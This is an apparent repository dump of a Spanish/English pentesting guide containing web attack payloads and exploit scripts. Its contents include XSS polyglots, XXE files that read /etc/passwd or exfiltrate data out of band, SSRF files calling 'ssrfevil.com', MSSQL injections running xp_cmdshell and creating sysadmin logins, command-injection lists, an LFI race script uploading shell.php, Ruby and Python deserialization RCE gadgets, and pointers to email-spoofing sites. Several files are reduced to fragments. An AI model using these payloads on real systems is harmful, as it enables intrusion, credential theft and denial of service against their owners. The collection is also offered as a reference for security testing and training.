├── Web Application ├── File Upload │ └── README.md ├── XSS Injection │ ├── Files PoC │ │ ├── ">

]]> 2 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Golden Guide for Pentesters. 2 | 3 | * This guide will become obsolete. New version 2025 *coming soon*! 4 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/SVG_XSS4.svg: -------------------------------------------------------------------------------- 1 | <![CDATA[]]> 2 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/xml.xsd: -------------------------------------------------------------------------------- 1 | alert(1) 2 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/xss.dtd: -------------------------------------------------------------------------------- 1 | alert(1) 2 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/xss.mno: -------------------------------------------------------------------------------- 1 | alert(1337) 2 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/xss.rdf: -------------------------------------------------------------------------------- 1 | alert(1) 2 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/xss.svgz: -------------------------------------------------------------------------------- 1 | alert(1) 2 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/xss.vml: -------------------------------------------------------------------------------- 1 | alert(1) 2 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/xss.wsdl: -------------------------------------------------------------------------------- 1 | alert(1) 2 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/xss.xht: -------------------------------------------------------------------------------- 1 | alert(1) 2 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/xss.xhtml: -------------------------------------------------------------------------------- 1 | alert(1) 2 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/xss.xsd: -------------------------------------------------------------------------------- 1 | alert(1) 2 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/xss.xsf: -------------------------------------------------------------------------------- 1 | alert(1) 2 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/xss.xsl: -------------------------------------------------------------------------------- 1 | alert(1) 2 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/xss.xslt: -------------------------------------------------------------------------------- 1 | alert(1) 2 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/xss.html.demo: -------------------------------------------------------------------------------- 1 | alert(1) 2 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/xss.url.url: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/SVG_XSS3.svg: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Web Application/SSRF/Images/ssrf_ffmpeg.avi: -------------------------------------------------------------------------------- 1 | #EXTM3U 2 | #EXT-X-MEDIA-SEQUENCE:0 3 | #EXTINF:1.0 4 | http://ssrfevil.com 5 | #EXT-X-ENDLIST -------------------------------------------------------------------------------- /Web Application/Fuzzing/g0ld3n-ok.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xCGonzalo/Golden-Guide-for-Pentesting/HEAD/Web Application/Fuzzing/g0ld3n-ok.txt -------------------------------------------------------------------------------- /Web Application/Fuzzing/fdb_1.0.tar.bz2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xCGonzalo/Golden-Guide-for-Pentesting/HEAD/Web Application/Fuzzing/fdb_1.0.tar.bz2 -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/xss.swf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xCGonzalo/Golden-Guide-for-Pentesting/HEAD/Web Application/XSS Injection/Files PoC/xss.swf -------------------------------------------------------------------------------- /Web Application/XXE/Files/Classic XXE B64 Encoded.xml: -------------------------------------------------------------------------------- 1 | %init; ]> 2 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/SWF_XSS.swf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xCGonzalo/Golden-Guide-for-Pentesting/HEAD/Web Application/XSS Injection/Files PoC/SWF_XSS.swf -------------------------------------------------------------------------------- /Web Application/SQL Injection/Images/PostgreSQL_cmd_exec.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xCGonzalo/Golden-Guide-for-Pentesting/HEAD/Web Application/SQL Injection/Images/PostgreSQL_cmd_exec.png -------------------------------------------------------------------------------- /Web Application/SQL Injection/Images/Unicode_SQL_injection.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xCGonzalo/Golden-Guide-for-Pentesting/HEAD/Web Application/SQL Injection/Images/Unicode_SQL_injection.png -------------------------------------------------------------------------------- /Web Application/SQL Injection/Images/wildcard_underscore.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xCGonzalo/Golden-Guide-for-Pentesting/HEAD/Web Application/SQL Injection/Images/wildcard_underscore.jpg -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/InsecureFlashFile.swf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xCGonzalo/Golden-Guide-for-Pentesting/HEAD/Web Application/XSS Injection/Files PoC/InsecureFlashFile.swf -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/onclick-xss-ecs.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xCGonzalo/Golden-Guide-for-Pentesting/HEAD/Web Application/XSS Injection/Files PoC/onclick-xss-ecs.jpeg -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/payload_text_xss.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xCGonzalo/Golden-Guide-for-Pentesting/HEAD/Web Application/XSS Injection/Files PoC/payload_text_xss.png -------------------------------------------------------------------------------- /Web Application/XXE/Files/Classic XXE.xml: -------------------------------------------------------------------------------- 1 | 2 | 4 | 5 | ]> 6 | &file; -------------------------------------------------------------------------------- /Web Application/XXE/Files/Classic XXE - etc passwd.xml: -------------------------------------------------------------------------------- 1 | 2 | 4 | 5 | ]> 6 | &file; 7 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/payload_in_all_known_metadata.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xCGonzalo/Golden-Guide-for-Pentesting/HEAD/Web Application/XSS Injection/Files PoC/payload_in_all_known_metadata.jpg -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/payload_in_all_known_metadata.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xCGonzalo/Golden-Guide-for-Pentesting/HEAD/Web Application/XSS Injection/Files PoC/payload_in_all_known_metadata.png -------------------------------------------------------------------------------- /Web Application/SSRF/Images/SSRF_expect.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Web Application/SSRF/Images/SSRF_url.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Web Application/SSRF/Images/ssrf_svg_use.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/payload_in_all_known_exif_corrupted.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xCGonzalo/Golden-Guide-for-Pentesting/HEAD/Web Application/XSS Injection/Files PoC/payload_in_all_known_exif_corrupted.jpg -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/payload_in_all_known_exif_corrupted.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xCGonzalo/Golden-Guide-for-Pentesting/HEAD/Web Application/XSS Injection/Files PoC/payload_in_all_known_exif_corrupted.png -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/xss_comment_exif_metadata_double_quote.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xCGonzalo/Golden-Guide-for-Pentesting/HEAD/Web Application/XSS Injection/Files PoC/xss_comment_exif_metadata_double_quote.png -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/xss_comment_exif_metadata_single_quote.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xCGonzalo/Golden-Guide-for-Pentesting/HEAD/Web Application/XSS Injection/Files PoC/xss_comment_exif_metadata_single_quote.png -------------------------------------------------------------------------------- /Web Application/SSRF/Images/ssrf_svg_image.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Web Application/SSRF/Images/ssrf_svg_css_import.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Web Application/README.md: -------------------------------------------------------------------------------- 1 | This is a Web Security Guide for Pentesting, BugBounty and CTFs. 2 | 3 |

4 | 5 | *Picture from Bug Bounty Playbook v2* 6 | -------------------------------------------------------------------------------- /Web Application/SSRF/Images/ssrf_svg_css_xmlstylesheet.svg: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Web Application/Access Control/Files/ExtensionsBypass.md: -------------------------------------------------------------------------------- 1 | ? 2 | ?? 3 | & 4 | # 5 | % 6 | %20 7 | %09 8 | / 9 | /..;/ 10 | ../ 11 | ..%2f 12 | ..;/ 13 | ../ 14 | \..\.\ 15 | .././ 16 | ..%00/ 17 | ..%0d/ 18 | ..%5c 19 | ..\ 20 | ..%ff/ 21 | %2e%2e%2f 22 | .%2e/ 23 | %3f 24 | %26 25 | %23 26 | .json 27 | -------------------------------------------------------------------------------- /Web Application/SSRF/Images/ssrf_iframe.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Web Application/Missing Insufficient SPF/README.md: -------------------------------------------------------------------------------- 1 | # Missing Insufficient SPF 2 | 3 | Check if SPF record is missconfigured 4 | 5 | ``` 6 | https://www.kitterman.com/spf/validate.html 7 | https://mxtoolbox.com/ 8 | ``` 9 | 10 | Create fake mail 11 | 12 | ``` 13 | https://emkei.cz/ 14 | ``` 15 | ``` 16 | https://www.spoofbox.com/ 17 | ``` 18 | -------------------------------------------------------------------------------- /Web Application/SSRF/Images/ssrf_svg_css_link.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Web Application/XXE/Files/avatarImage_DisplayEtcHostnameFile.svg: -------------------------------------------------------------------------------- 1 | 2 | ]> 3 | -------------------------------------------------------------------------------- /Web Application/XXE/Files/Deny Of Service - Billion Laugh Attack.txt: -------------------------------------------------------------------------------- 1 | 3 | 4 | 5 | 6 | 7 | ]> 8 | &a4; -------------------------------------------------------------------------------- /Web Application/SQL Injection/Intruder/Polyglots.txt: -------------------------------------------------------------------------------- 1 | SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/ 2 | SELECT 1,2,IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/ FROM some_table WHERE ex = ample -------------------------------------------------------------------------------- /Web Application/XXE/Files/XXE PHP Wrapper.xml: -------------------------------------------------------------------------------- 1 | ]> 2 | 3 | 4 | Jean &xxe; Dupont 5 | 00 11 22 33 44 6 |

42 rue du CTF

7 | 75000 8 | Paris 9 | 10 | 11 | -------------------------------------------------------------------------------- /Web Application/XXE/Files/XXE OOB Attack (Yunusov, 2013).xml: -------------------------------------------------------------------------------- 1 | XXE OOB Attack (Yunusov, 2013) 2 | 3 | 4 | &send; 5 | 6 | File stored on http://publicServer.com/parameterEntity_oob.dtd 7 | 8 | "> 9 | %all; -------------------------------------------------------------------------------- /Web Application/Subdomain Takeover/README.md: -------------------------------------------------------------------------------- 1 | ## Summary 2 | 3 | * [Formas de Explotación](#formas-de-explotacion) 4 | 5 | ## Formas de Explotación: 6 | 7 | ``` 8 | https://github.com/EdOverflow/can-i-take-over-xyz 9 | ``` 10 | 11 | *Para ver un ejemplo claro, revise la página 40-44 del libro "Bug Bounty Playbook v2":* 12 | 13 |

14 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/SVG_XSS.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 10 | -------------------------------------------------------------------------------- /Web Application/template.md: -------------------------------------------------------------------------------- 1 | # Vulnerability Title 2 | 3 | > Vulnerability description - reference 4 | 5 | ## Summary 6 | 7 | * [Something](#something) 8 | * [Subentry 1](#sub1) 9 | * [Subentry 2](#sub2) 10 | 11 | ## Tools 12 | 13 | - [Tool 1](https://example.com) 14 | - [Tool 2](https://example.com) 15 | 16 | ### Something1 17 | 18 | Quick explanation 19 | 20 | ```powershell 21 | Exploit 22 | ``` 23 | 24 | ### Something2 25 | 26 | Quick explanation 27 | 28 | ```powershell 29 | Exploit 30 | ``` 31 | ### References 32 | 33 | - [Link](https://example.com) 34 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/xss.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | alert(1) 5 | alert(2) 6 | 7 | 8 | confirm(document.domain)]]> 9 | 10 | 11 | Hello 12 | 13 | 14 | http://google.com 15 | 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /Web Application/LFI and RFI/uploadlfi.py: -------------------------------------------------------------------------------- 1 | from __future__ import print_function 2 | from builtins import range 3 | import itertools 4 | import requests 5 | import string 6 | import sys 7 | 8 | print('[+] Trying to win the race') 9 | f = {'file': open('shell.php', 'rb')} 10 | for _ in range(4096 * 4096): 11 | requests.post('http://target.com/index.php?c=index.php', f) 12 | 13 | 14 | print('[+] Bruteforcing the inclusion') 15 | for fname in itertools.combinations(string.ascii_letters + string.digits, 6): 16 | url = 'http://target.com/index.php?c=/tmp/php' + fname 17 | r = requests.get(url) 18 | if 'load average' in r.text: # Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system 4 | 5 | ## Summary 6 | 7 | * [Cassandra comment](#cassandra-comment) 8 | * [Cassandra - Login Bypass](#cassandra---login-bypass) 9 | * [Login Bypass 0](#login-bypass-0) 10 | * [Login Bypass 1](#login-bypass-1) 11 | * [References](#references) 12 | 13 | ## Cassandra comment 14 | 15 | ```sql 16 | /* Cassandra Comment */ 17 | ``` 18 | 19 | ## Cassandra - Login Bypass 20 | 21 | ### Login Bypass 0 22 | 23 | ```sql 24 | username: admin' ALLOW FILTERING; %00 25 | password: ANY 26 | ``` 27 | 28 | ### Login Bypass 1 29 | 30 | ```sql 31 | username: admin'/* 32 | password: */and pass>' 33 | ``` 34 | 35 | The injection would look like the following SQL query 36 | 37 | ```sql 38 | SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILTERING; 39 | ``` 40 | -------------------------------------------------------------------------------- /Web Application/HTML Injection/README.md: -------------------------------------------------------------------------------- 1 | # HTML Injection 2 | 3 | HTML injection is a type of injection vulnerability that occurs when a user is able to control an input point and is able to inject arbitrary HTML code into a vulnerable web page. This vulnerability can have many consequences, like disclosure of a user’s session cookies that could be used to impersonate the victim, or, more generally, it can allow the attacker to modify the page content seen by the victims. 4 | 5 | ## Summary 6 | - [Payloads](#payloads) 7 | 8 | 9 | 10 | ## Payloads 11 | 12 | ``` 13 | ">test 14 | 15 | ">test 16 | 17 | ">

test

18 | 19 | ">

TEST

20 | 21 |

TEST

Test2

22 | 23 |

CLICKME

24 | 25 | "/>

test

26 | 27 | ">negrita 28 | ``` 29 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Intruder/xss_swf_fuzz.txt: -------------------------------------------------------------------------------- 1 | #getURL,javascript:alert(1)", 2 | #goto,javascript:alert(1)", 3 | ?javascript:alert(1)", 4 | ?alert(1)", 5 | ?getURL(javascript:alert(1))", 6 | ?asfunction:getURL,javascript:alert(1)//", 7 | ?getURL,javascript:alert(1)", 8 | ?goto,javascript:alert(1)", 9 | ?clickTAG=javascript:alert(1)", 10 | ?url=javascript:alert(1)", 11 | ?clickTAG=javascript:alert(1)&TargetAS=", 12 | ?TargetAS=javascript:alert(1)", 13 | ?skinName=asfunction:getURL,javascript:alert(1)//", 14 | ?baseurl=asfunction:getURL,javascript:alert(1)//", 15 | ?base=javascript:alert(0)", 16 | ?onend=javascript:alert(1)//", 17 | ?userDefined=');function someFunction(a){}alert(1)//", 18 | ?URI=javascript:alert(1)", 19 | ?callback=javascript:alert(1)", 20 | ?getURLValue=javascript:alert(1)", 21 | ?goto=javascript:alert(1)", 22 | ?pg=javascript:alert(1)", 23 | ?page=javascript:alert(1)" 24 | ?playerready=alert(document.cookie) -------------------------------------------------------------------------------- /Web Application/Broken Link Hijacking/README.md: -------------------------------------------------------------------------------- 1 | # Broken Link Hijacking 2 | 3 | ## Summary 4 | 5 | * [Exploitation](#exploitation) 6 | * [Check Online](#check-online) 7 | * [References](#references) 8 | 9 | ## Exploitation 10 | 11 | Encuentre y clickee sobre links que aparezcan en la aplicación objetivo (Por ejemplo, links hacia redes sociales u otros) 12 | 13 | Mientras hace esto, corra esta [herramienta](https://github.com/stevenvachon/broken-link-checker) para ayudarlo a encontrar enlaces externos rotos. 14 | 15 | ``` 16 | blc -rof --filter-level 3 https://example.com/ 17 | ``` 18 | 19 | La salida en un caso de exito se verá así: 20 | 21 | ``` 22 | ─BROKEN─ https://www.linkedin.com/company/ACME-inc-/ (HTTP_999) 23 | ``` 24 | 25 | Si, por ejemplo, algún enlace lo redirige a un link de LinkdIn que no exista (404 response), intente crear una cuenta en LinkedIn con el nombre del recurso externo llamado desde la aplicación víctima. 26 | 27 | ## Check Online 28 | 29 | https://brokenlinkcheck.com/ 30 | 31 | https://ahrefs.com/broken-link-checker 32 | 33 | ## References 34 | 35 | https://medium.com/@bathinivijaysimhareddy/how-i-takeover-the-companys-linkedin-page-790c9ed2b04d 36 | -------------------------------------------------------------------------------- /Web Application/SQL Injection/Intruder/MSSQL_Fuzz.txt: -------------------------------------------------------------------------------- 1 | # You will need to customize/modify some of the vaules in the queries for best effect 2 | 3 | '; exec master..xp_cmdshell 'ping 10.10.1.2'-- 4 | 'create user name identified by 'pass123' -- 5 | 'create user name identified by pass123 temporary tablespace temp default tablespace users; 6 | ' ; drop table temp -- 7 | 'exec sp_addlogin 'name' , 'password' -- 8 | ' exec sp_addsrvrolemember 'name' , 'sysadmin' -- 9 | ' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) -- 10 | ' grant connect to name; grant resource to name; -- 11 | ' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64) 12 | ' or 1=1 -- 13 | ' union (select @@version) -- 14 | ' union (select NULL, (select @@version)) -- 15 | ' union (select NULL, NULL, (select @@version)) -- 16 | ' union (select NULL, NULL, NULL, (select @@version)) -- 17 | ' union (select NULL, NULL, NULL, NULL, (select @@version)) -- 18 | ' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) -- -------------------------------------------------------------------------------- /Web Application/SQL Injection/Intruder/MSSQL_Enumeration.txt: -------------------------------------------------------------------------------- 1 | # ms-sqli info disclosure payload fuzzfile 2 | # replace regex with your fuzzer for best results 3 | # run wireshark or tcpdump, look for incoming smb or icmp packets from victim 4 | # might need to terminate payloads with ;-- 5 | 6 | select @@version;-- 7 | select @@servernamee;-- 8 | select @@microsoftversione;-- 9 | select * from master..sysserverse;-- 10 | select * from sysusers;-- 11 | exec master..xp_cmdshell 'ipconfig+/all';-- 12 | exec master..xp_cmdshell 'net+view';-- 13 | exec master..xp_cmdshell 'net+users';-- 14 | exec master..xp_cmdshell 'ping+';-- 15 | BACKUP database master to disks='\\\\backupdb.dat';-- 16 | create table myfile (line varchar(8000))" bulk insert foo from 'c:\inetpub\wwwroot\auth.asp�'" select * from myfile"-- 17 | 18 | select @@version 19 | select @@servernamee 20 | select @@microsoftversione 21 | select * from master..sysserverse 22 | select * from sysusers 23 | exec master..xp_cmdshell 'ipconfig+/all' 24 | exec master..xp_cmdshell 'net+view' 25 | exec master..xp_cmdshell 'net+users' 26 | exec master..xp_cmdshell 'ping+' 27 | BACKUP database master to disks='\\\\backupdb.dat' 28 | create table myfile (line varchar(8000))" bulk insert foo from 'c:\inetpub\wwwroot\auth.asp�'" select * from myfile"-- -------------------------------------------------------------------------------- /Web Application/Insecure Deserialization/Files/PHP-Serialization-RCE-exploit.php: -------------------------------------------------------------------------------- 1 | 33 | -------------------------------------------------------------------------------- /Web Application/Insecure Deserialization/Ruby.md: -------------------------------------------------------------------------------- 1 | # Ruby Deserialization 2 | 3 | ## Marshal.load 4 | 5 | Script to generate and verify the deserialization gadget chain against Ruby 2.0 through to 2.5 6 | 7 | ```ruby 8 | for i in {0..5}; do docker run -it ruby:2.${i} ruby -e 'Marshal.load(["0408553a1547656d3a3a526571756972656d656e745b066f3a1847656d3a3a446570656e64656e63794c697374073a0b4073706563735b076f3a1e47656d3a3a536f757263653a3a537065636966696346696c65063a0a40737065636f3a1b47656d3a3a5374756253706563696669636174696f6e083a11406c6f616465645f66726f6d49220d7c696420313e2632063a0645543a0a4064617461303b09306f3b08003a1140646576656c6f706d656e7446"].pack("H*")) rescue nil'; done 9 | ``` 10 | 11 | ## Yaml.load 12 | 13 | Vulnerable code 14 | ```ruby 15 | require "yaml" 16 | YAML.load(File.read("p.yml")) 17 | ``` 18 | 19 | Exploitation code 20 | ```ruby 21 | --- !ruby/object:Gem::Requirement 22 | requirements: 23 | !ruby/object:Gem::DependencyList 24 | specs: 25 | - !ruby/object:Gem::Source::SpecificFile 26 | spec: &1 !ruby/object:Gem::StubSpecification 27 | loaded_from: "|id 1>&2" 28 | - !ruby/object:Gem::Source::SpecificFile 29 | spec: 30 | ``` 31 | 32 | 33 | ## References 34 | 35 | - [RUBY 2.X UNIVERSAL RCE DESERIALIZATION GADGET CHAIN - elttam, Luke Jahnke](https://www.elttam.com.au/blog/ruby-deserialization/) 36 | - [Universal RCE with Ruby YAML.load - @_staaldraad ](https://staaldraad.github.io/post/2019-03-02-universal-rce-ruby-yaml-load/) 37 | - [Online access to Ruby 2.x Universal RCE Deserialization Gadget Chain - PentesterLab](https://pentesterlab.com/exercises/ruby_ugadget/online) 38 | -------------------------------------------------------------------------------- /Web Application/Insecure Deserialization/Files/Ruby-Universal-Gadget-Generate-Verify.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | class Gem::StubSpecification 4 | def initialize; end 5 | end 6 | 7 | 8 | stub_specification = Gem::StubSpecification.new 9 | stub_specification.instance_variable_set(:@loaded_from, "|") 10 | 11 | puts "STEP n" 12 | stub_specification.name rescue nil 13 | puts 14 | 15 | 16 | class Gem::Source::SpecificFile 17 | def initialize; end 18 | end 19 | 20 | specific_file = Gem::Source::SpecificFile.new 21 | specific_file.instance_variable_set(:@spec, stub_specification) 22 | 23 | other_specific_file = Gem::Source::SpecificFile.new 24 | 25 | puts "STEP n-1" 26 | specific_file <=> other_specific_file rescue nil 27 | puts 28 | 29 | 30 | $dependency_list= Gem::DependencyList.new 31 | $dependency_list.instance_variable_set(:@specs, [specific_file, other_specific_file]) 32 | 33 | puts "STEP n-2" 34 | $dependency_list.each{} rescue nil 35 | puts 36 | 37 | 38 | class Gem::Requirement 39 | def marshal_dump 40 | [$dependency_list] 41 | end 42 | end 43 | 44 | payload = Marshal.dump(Gem::Requirement.new) 45 | 46 | puts "STEP n-3" 47 | Marshal.load(payload) rescue nil 48 | puts 49 | 50 | 51 | puts "VALIDATION (in fresh ruby process):" 52 | IO.popen("ruby -e 'Marshal.load(STDIN.read) rescue nil'", "r+") do |pipe| 53 | pipe.print payload 54 | pipe.close_write 55 | puts pipe.gets 56 | puts 57 | end 58 | 59 | puts "Payload (hex):" 60 | puts payload.unpack('H*')[0] 61 | puts 62 | 63 | 64 | require "base64" 65 | puts "Payload (Base64 encoded):" 66 | puts Base64.encode64(payload) 67 | -------------------------------------------------------------------------------- /Web Application/OS Command Injection/Intruder/command-execution-unix.txt: -------------------------------------------------------------------------------- 1 |  2 |  3 |  4 |  5 | /index.html|id| 6 | ";id;" 7 | ';id;' 8 | ;id; 9 | ;id 10 | ;netstat -a; 11 | "|id|" 12 | '|id|' 13 | |id 14 | |/usr/bin/id 15 | |id| 16 | "|/usr/bin/id|" 17 | '|/usr/bin/id|' 18 | |/usr/bin/id| 19 | "||/usr/bin/id|" 20 | '||/usr/bin/id|' 21 | ||/usr/bin/id| 22 | |id; 23 | ||/usr/bin/id; 24 | ;id| 25 | ;|/usr/bin/id| 26 | "\n/bin/ls -al\n" 27 | '\n/bin/ls -al\n' 28 | \n/bin/ls -al\n 29 | \n/usr/bin/id\n 30 | \nid\n 31 | \n/usr/bin/id; 32 | \nid; 33 | \n/usr/bin/id| 34 | \nid| 35 | ;/usr/bin/id\n 36 | ;id\n 37 | |usr/bin/id\n 38 | |nid\n 39 | `id` 40 | `/usr/bin/id` 41 | a);id 42 | a;id 43 | a);id; 44 | a;id; 45 | a);id| 46 | a;id| 47 | a)|id 48 | a|id 49 | a)|id; 50 | a|id 51 | |/bin/ls -al 52 | a);/usr/bin/id 53 | a;/usr/bin/id 54 | a);/usr/bin/id; 55 | a;/usr/bin/id; 56 | a);/usr/bin/id| 57 | a;/usr/bin/id| 58 | a)|/usr/bin/id 59 | a|/usr/bin/id 60 | a)|/usr/bin/id; 61 | a|/usr/bin/id 62 | ;system('cat%20/etc/passwd') 63 | ;system('id') 64 | ;system('/usr/bin/id') 65 | %0Acat%20/etc/passwd 66 | %0A/usr/bin/id 67 | %0Aid 68 | %22%0A/usr/bin/id%0A%22 69 | %27%0A/usr/bin/id%0A%27 70 | %0A/usr/bin/id%0A 71 | %0Aid%0A 72 | "& ping -i 30 127.0.0.1 &" 73 | '& ping -i 30 127.0.0.1 &' 74 | & ping -i 30 127.0.0.1 & 75 | & ping -n 30 127.0.0.1 & 76 | %0a ping -i 30 127.0.0.1 %0a 77 | `ping 127.0.0.1` 78 | | id 79 | & id 80 | ; id 81 | %0a id %0a 82 | `id` 83 | $;/usr/bin/id 84 | -------------------------------------------------------------------------------- /Web Application/Insecure Deserialization/Python.md: -------------------------------------------------------------------------------- 1 | # Python Deserialization 2 | 3 | ## Pickle 4 | 5 | The following code is a simple example of using `cPickle` in order to generate an auth_token which is a serialized User object. 6 | 7 | ```python 8 | import cPickle 9 | from base64 import b64encode, b64decode 10 | 11 | class User: 12 | def __init__(self): 13 | self.username = "anonymous" 14 | self.password = "anonymous" 15 | self.rank = "guest" 16 | 17 | h = User() 18 | auth_token = b64encode(cPickle.dumps(h)) 19 | print("Your Auth Token : {}").format(auth_token) 20 | ``` 21 | 22 | The vulnerability is introduced when a token is loaded from an user input. 23 | 24 | ```python 25 | new_token = raw_input("New Auth Token : ") 26 | token = cPickle.loads(b64decode(new_token)) 27 | print "Welcome {}".format(token.username) 28 | ``` 29 | 30 | Python 2.7 documentation clearly states Pickle should never be used with untrusted sources. Let's create a malicious data that will execute arbitrary code on the server. 31 | 32 | > The pickle module is not secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source. 33 | 34 | ```python 35 | import cPickle 36 | from base64 import b64encode, b64decode 37 | 38 | class Evil(object): 39 | def __reduce__(self): 40 | return (os.system,("whoami",)) 41 | 42 | e = Evil() 43 | evil_token = b64encode(cPickle.dumps(e)) 44 | print("Your Evil Token : {}").format(evil_token) 45 | ``` 46 | 47 | ## References 48 | 49 | * [Exploiting misuse of Python's "pickle" - Mar 20, 2011](https://blog.nelhage.com/2011/03/exploiting-pickle/) 50 | * [Python Pickle Injection - Apr 30, 2017](http://xhyumiracle.com/python-pickle-injection/) 51 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Intruder/PolyglotsXSS.txt: -------------------------------------------------------------------------------- 1 | jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/

"><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm(1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg"> 5 | javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/* 6 | javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a 7 | javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/ 8 | javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/* 9 | javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/* 10 | javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()// 11 | javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/* 12 | --></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/* 13 | /</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/* 14 | javascript://--></title></style></textarea></script><svg "//' onclick=alert()// 15 | /</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/* -------------------------------------------------------------------------------- /Web Application/LFI and RFI/Intruder/lfirfi_Linux_Payloads.txt: -------------------------------------------------------------------------------- 1 | /etc/passwd 2 | /etc/group 3 | /etc/hosts 4 | /etc/motd 5 | /etc/issue 6 | /etc/bashrc 7 | /etc/apache2/apache2.conf 8 | /etc/apache2/ports.conf 9 | /etc/apache2/sites-available/default 10 | /etc/httpd/conf/httpd.conf 11 | /etc/httpd/conf.d 12 | /etc/httpd/logs/access.log 13 | /etc/httpd/logs/access_log 14 | /etc/httpd/logs/error.log 15 | /etc/httpd/logs/error_log 16 | /etc/init.d/apache2 17 | /etc/mysql/my.cnf 18 | /etc/nginx.conf 19 | /opt/lampp/logs/access_log 20 | /opt/lampp/logs/error_log 21 | /opt/lamp/log/access_log 22 | 